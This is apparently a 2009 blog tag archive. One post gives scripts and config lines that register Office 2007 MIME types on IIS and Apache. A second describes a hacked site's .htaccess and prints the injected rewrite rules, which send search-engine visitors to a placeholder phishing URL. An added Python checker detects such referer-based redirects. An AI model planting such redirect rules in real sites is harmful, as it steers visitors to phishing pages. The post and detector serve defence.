Tag-Archive for » htaccess «

Saturday, February 21st, 2009 | Author:

The new Office 2007 document formats have given some web hosts problems when their customers want to offer documents for download. Often, the documents are served by the web server as "text/html", which is then rendered as garbage on the web user's screen.

The best way to resolve this is to add all the MIME types to the server's main configuration. IIS7 for Windows already has these MIME types set up correctly. IIS6 and IIS5 need the MIME types to be added, as may older Apache installations. For Apache, there is also a workaround that lets an individual domain owner add the MIME types via Apache's .htaccess file.

IIS 6 MIME type addition (for the Server Administrator)

Before doing this, make sure that your server is also set to allow direct metabase editing:

  1. Load the IIS Manager: Start -> Run, "inetmgr" -> [OK]
  2. Right-click the "server" and click "Properties"
  3. In the "Internet Information Services" tab (usually the only tab), make sure that the "Enable Direct Metabase Edit" checkbox is checked.
  4. Click [OK]

Make sure you back up your IIS configuration (here for IIS5) beforehand. I will not take any responsibility for an admin breaking their server. I have reason to believe this may also work on IIS5, however I have much more reason to believe that it could give many errors. If an IIS5 / Windows 2000 admin is willing to test this for me after backing up their configuration, please let me know the results.

Copy the following script into a file called msoff07-addmime.vbs and execute it once from the command line by typing cscript msoff07-addmime.vbs and pressing Enter. If you run it more than once, the MIME types will be added each time and you will have multiple identical entries:

' This script adds the necessary Office 2007 MIME types to an IIS 6 Server.
' To use this script, just double-click or execute it from a command line.
' Running this script multiple times results in multiple entries in the
' IIS MimeMap so you should not run it more than once.
' Modified from http://msdn.microsoft.com/en-us/library/ms752346.aspx

Dim MimeMapObj, MimeMapArray, MimeTypesToAddArray, WshShell, oExec
Const ADS_PROPERTY_UPDATE = 2

' Set the MIME types to be added
MimeTypesToAddArray = Array(".docm", "application/vnd.ms-word.document.macroEnabled.12", _
".docx", "application/vnd.openxmlformats-officedocument.wordprocessingml.document", _
".dotm", "application/vnd.ms-word.template.macroEnabled.12", _
".dotx", "application/vnd.openxmlformats-officedocument.wordprocessingml.template", _
".potm", "application/vnd.ms-powerpoint.template.macroEnabled.12", _
".potx", "application/vnd.openxmlformats-officedocument.presentationml.template", _
".ppam", "application/vnd.ms-powerpoint.addin.macroEnabled.12", _
".ppsm", "application/vnd.ms-powerpoint.slideshow.macroEnabled.12", _
".ppsx", "application/vnd.openxmlformats-officedocument.presentationml.slideshow", _
".pptm", "application/vnd.ms-powerpoint.presentation.macroEnabled.12", _
".pptx", "application/vnd.openxmlformats-officedocument.presentationml.presentation", _
".sldm", "application/vnd.ms-powerpoint.slide.macroEnabled.12", _
".sldx", "application/vnd.openxmlformats-officedocument.presentationml.slide", _
".xlam", "application/vnd.ms-excel.addin.macroEnabled.12", _
".xlsb", "application/vnd.ms-excel.sheet.binary.macroEnabled.12", _
".xlsm", "application/vnd.ms-excel.sheet.macroEnabled.12", _
".xlsx", "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet", _
".xltm", "application/vnd.ms-excel.template.macroEnabled.12", _
".xltx", "application/vnd.openxmlformats-officedocument.spreadsheetml.template") 
 
' Get the mimemap object
Set MimeMapObj = GetObject("IIS://LocalHost/MimeMap")

' Call AddMimeType for every pair of extension/MIME type
For counter = 0 To UBound(MimeTypesToAddArray) Step 2
    AddMimeType MimeTypesToAddArray(counter), MimeTypesToAddArray(counter+1)
Next

' Create a Shell object
Set WshShell = CreateObject("WScript.Shell")

' Stop and Start the IIS Service
Set oExec = WshShell.Exec("net stop w3svc")
Do While oExec.Status = 0
    WScript.Sleep 100
Loop

Set oExec = WshShell.Exec("net start w3svc")
Do While oExec.Status = 0
    WScript.Sleep 100
Loop

Set oExec = Nothing

' Report status to user
WScript.Echo "Microsoft Office 2007 Document MIME types have been registered."

' AddMimeType Sub
Sub AddMimeType (Ext, MType)

    ' Get the mappings from the MimeMap property.
    MimeMapArray = MimeMapObj.GetEx("MimeMap")

    ' Add a new mapping.
    i = UBound(MimeMapArray) + 1
    ReDim Preserve MimeMapArray(i)
    Set MimeMapArray(i) = CreateObject("MimeMap")
    MimeMapArray(i).Extension = Ext
    MimeMapArray(i).MimeType = MType
    MimeMapObj.PutEx ADS_PROPERTY_UPDATE, "MimeMap", MimeMapArray
    MimeMapObj.SetInfo

End Sub

Apache MIME type addition (for the Server Administrator)

Apache stores its MIME types in a file normally located at $installpath/conf/mime.types. See the mod_mime documentation for more details on how it works. Arch Linux installs its MIME types at /etc/httpd/conf/mime.types and Parallels Plesk installs them at /usr/local/psa/admin/conf/mime.types. Your distribution may keep the file elsewhere, so search for the mime.types file by running locate mime.types.

Add the following lines to your mime.types file:

application/vnd.ms-word.document.macroEnabled.12                          docm
application/vnd.openxmlformats-officedocument.wordprocessingml.document   docx
application/vnd.ms-word.template.macroEnabled.12                          dotm
application/vnd.openxmlformats-officedocument.wordprocessingml.template   dotx
application/vnd.ms-powerpoint.template.macroEnabled.12                    potm
application/vnd.openxmlformats-officedocument.presentationml.template     potx
application/vnd.ms-powerpoint.addin.macroEnabled.12                       ppam
application/vnd.ms-powerpoint.slideshow.macroEnabled.12                   ppsm
application/vnd.openxmlformats-officedocument.presentationml.slideshow    ppsx
application/vnd.ms-powerpoint.presentation.macroEnabled.12                pptm
application/vnd.openxmlformats-officedocument.presentationml.presentation pptx
application/vnd.ms-powerpoint.slide.macroEnabled.12                       sldm
application/vnd.openxmlformats-officedocument.presentationml.slide        sldx
application/vnd.ms-excel.addin.macroEnabled.12                            xlam
application/vnd.ms-excel.sheet.binary.macroEnabled.12                     xlsb
application/vnd.ms-excel.sheet.macroEnabled.12                            xlsm
application/vnd.openxmlformats-officedocument.spreadsheetml.sheet         xlsx
application/vnd.ms-excel.template.macroEnabled.12                         xltm
application/vnd.openxmlformats-officedocument.spreadsheetml.template      xltx

Apache MIME type addition (for the domain owner with at least FTP access, using a .htaccess file)

Add the following text to your domain's .htaccess file, most commonly in an httpdocs/ directory:

AddType application/vnd.ms-word.document.macroEnabled.12 docm
AddType application/vnd.openxmlformats-officedocument.wordprocessingml.document docx
AddType application/vnd.ms-word.template.macroEnabled.12 dotm
AddType application/vnd.openxmlformats-officedocument.wordprocessingml.template dotx
AddType application/vnd.ms-powerpoint.template.macroEnabled.12 potm
AddType application/vnd.openxmlformats-officedocument.presentationml.template potx
AddType application/vnd.ms-powerpoint.addin.macroEnabled.12 ppam
AddType application/vnd.ms-powerpoint.slideshow.macroEnabled.12 ppsm
AddType application/vnd.openxmlformats-officedocument.presentationml.slideshow ppsx
AddType application/vnd.ms-powerpoint.presentation.macroEnabled.12 pptm
AddType application/vnd.openxmlformats-officedocument.presentationml.presentation pptx
AddType application/vnd.ms-powerpoint.slide.macroEnabled.12 sldm
AddType application/vnd.openxmlformats-officedocument.presentationml.slide sldx
AddType application/vnd.ms-excel.addin.macroEnabled.12 xlam
AddType application/vnd.ms-excel.sheet.binary.macroEnabled.12 xlsb
AddType application/vnd.ms-excel.sheet.macroEnabled.12 xlsm
AddType application/vnd.openxmlformats-officedocument.spreadsheetml.sheet xlsx
AddType application/vnd.ms-excel.template.macroEnabled.12 xltm
AddType application/vnd.openxmlformats-officedocument.spreadsheetml.template xltx

Thursday, January 22nd, 2009 | Author:

I very recently found a problem with a client's web site due to a .htaccess file. The site was hosted on a Windows server running IIS using IISPassword, which makes use of .htaccess files for its settings.

IISPassword doesn’t follow exactly the same rules as with Apache however. If the .htaccess file exists then it must contain IISPassword-appropriate rules, otherwise the server returns only the following error:

[Image: Error 500 given by IIS Password]

Here's the content of the .htaccess file. I've only modified the final redirection URL to point to example.com appropriately:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://siffy-phishing-url.example.com [R,L]

If this were on a server running Apache with mod_rewrite, most web users would go directly to the correct site content. Only if they reached the site through the search engines and indexes listed in the .htaccess, would they be redirected to the siffy phishing url that the cracker wants victims to reach.

Of course, the cracker (or perhaps even an automated worm) didn't realise that the server in question didn't even support these mod_rewrite rules. But either way, this is very worrying as I can foresee many arguments about whether or not the site is working
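
A detection check for the pattern described above, as an added example that is not part of the original post: it scans .htaccess text for a RewriteRule that sends visitors to another host only when HTTP_REFERER conditions match. The function name, the own_hosts parameter and the two sample rule sets are assumptions made for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed samples: a shortened copy of the injected rules, and a benign rule set.
INJECTED = r"""RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://siffy-phishing-url.example.com [R,L]
"""
BENIGN = r"""RewriteEngine On
RewriteCond %{HTTP_HOST} ^example\.org$ [NC]
RewriteRule ^(.*)$ http://www.example.org/$1 [R=301,L]
"""

REFERER_COND = re.compile(r'^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)', re.I)
ANY_COND = re.compile(r'^\s*RewriteCond\b', re.I)
RULE = re.compile(r'^\s*RewriteRule\s+\S+\s+(\S+)', re.I)

def find_referer_redirects(text, own_hosts=()):
    """Flag RewriteRules that send visitors off-site only when a Referer condition matches.

    own_hosts (hypothetical parameter): lowercase hostnames the site legitimately redirects to.
    """
    findings, pending = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith('#'):
            continue
        cond = REFERER_COND.match(line)
        if cond:
            pending.append(cond.group(1))
        elif ANY_COND.match(line):
            continue  # other conditions do not end the condition block
        else:
            rule = RULE.match(line)
            if not rule:
                continue
            # An absolute URL substitution naming another host is an external redirect.
            host = urlparse(rule.group(1)).hostname
            if pending and host and host not in own_hosts:
                findings.append({'line': lineno, 'target_host': host,
                                 'referer_patterns': pending})
            pending = []  # RewriteCond lines apply only to the next RewriteRule
    return findings

if __name__ == '__main__':
    for hit in find_referer_redirects(INJECTED):
        print(hit)
```

Because the redirect fires only for visitors arriving from a search engine, a direct visit to the site will not reveal it; checking the file contents, as here, does.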
